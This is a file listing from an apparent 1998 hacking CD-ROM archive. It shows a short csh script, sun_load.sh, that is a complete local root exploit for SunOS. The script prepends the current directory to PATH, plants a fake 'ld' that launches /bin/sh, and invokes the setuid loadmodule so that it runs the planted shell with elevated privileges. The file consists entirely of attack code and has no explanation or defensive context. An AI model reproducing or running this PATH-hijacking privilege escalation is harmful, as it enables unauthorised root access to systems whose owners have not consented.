home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / sun_load.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2003-06-11  |  106 b   |  8 lines

  1. #!/bin/csh
  2. set path = ( . $path )
  3. cat > ld << EOF
  4. /bin/sh
  5. EOF
  6. chmod a+x ld
  7. loadmodule sd.o evqload
  8.